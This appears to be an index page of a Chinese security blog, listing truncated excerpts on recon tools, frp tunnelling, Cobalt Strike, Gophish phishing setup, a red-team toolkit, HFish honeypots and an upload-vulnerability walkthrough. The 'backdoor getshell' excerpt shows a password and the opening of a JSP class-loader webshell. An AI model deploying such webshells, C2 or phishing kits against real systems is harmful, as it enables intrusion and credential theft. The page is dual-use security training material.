工具大全
DNS记录查询子域:https://dns.bufferover.run/dns?q=baidu.com 在线CMS指纹识别:http://whatweb.bugscaner.com/look/ DNS数据储存库:https://securitytrails.com/dns-trails CSR在线生成工具:https://myssl.com/cs…
frp内网穿透
Linux服务端安装流程 1.版本查询: arch 2.版本下载: wget https://github.com/fatedier/frp/releases/download/v0.42.0/frp_0.42.0_linux_amd64.tar.gz 3.解压: tar -zxvf frp_0.42.0_linux_amd64.tar.gz 4.…
Cobalt Strike使用教程
Linux服务器安装流程 一、安装JDK yum search java | grep jdk 二、配置vi /etc/profile #java export JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64 export PATH=$JAVA_HOME/…
Vbs加密介绍
Vbs加密介绍 背景 VBS脚本并不是自己用,我们都不希望自己辛辛苦苦努力的源码被别人免费占有,当然也可能是VBS源脚本文件包含密码等敏感信息,不希望使用者修改信息,防止出现错误。以下是VBS加密教程 新建一个encode.vbs文件导入以下代码 Option Explicit dim oEncoder, oFilesToEncode, file,…
安全岗位面试题目汇总
安全岗位面试题目汇总 目录 一、常用的外围打点工具有哪些? 二、描述一下外围打点的基本流程? 三、怎么识别CDN? 四、怎么判断靶标站点是windows系统还是Linux系统? 五、举常见的FOFA在外网打点过程中的查询语句? 六、常见的未授权访问漏洞有哪些? 七、文件上传功能的检测点有哪些? 八、常见的中间件有哪些,常见都有哪些相关漏洞? 九、介…
后门getshell
后门getshell 连接方式:xxx.x.x.x:xxxx/shell.jsp 连接密码:123456 <%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b,…
Gophish安装流程
1. 百度网盘地址 Linux x64版本 链接:https://pan.baidu.com/s/1YLVbIsuq6PcznPfFNE7IKA?pwd=4304 搭建环境:CentOS 7 网卡状态NAT 2. 解压压缩包 unzip gophish-v0.11.0-linux-64bit.zip 注意:本次测试路径为/root/Desktop/…
工具包集合
工具包集合 http://www.4hou.com/web/11241.html 史上最全攻击模拟工具盘点https://github.com/infosecn1nja/Red-Teaming-Toolkit 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、清理痕迹https://g…
HFish蜜罐
Linux下载部署 联网环境,一键安装 特别注意:Centos 是我们的原生开发和主力测试系统,我们最优推荐各位使用Centos系统进行安装。 当前HFish启动后会有两个进程,其中"hfish"进程为管理进程,负责监测、拉起和升级蜜罐主程序,"管理端"进程为蜜罐主程序进程,其执行蜜罐软件程序。` `Linu…
WebShell文件上传分析溯源2
1.使用御剑扫描到目录、admin/upoad.php 访问http://219.153.49.228:43368/admin/upload1.php,跳转‘upload2.php,正常是跳转到upload1.php(解决方法把火狐浏览器JS禁用:about:config 进入javascript.enabled把trun变成false) 上传一句…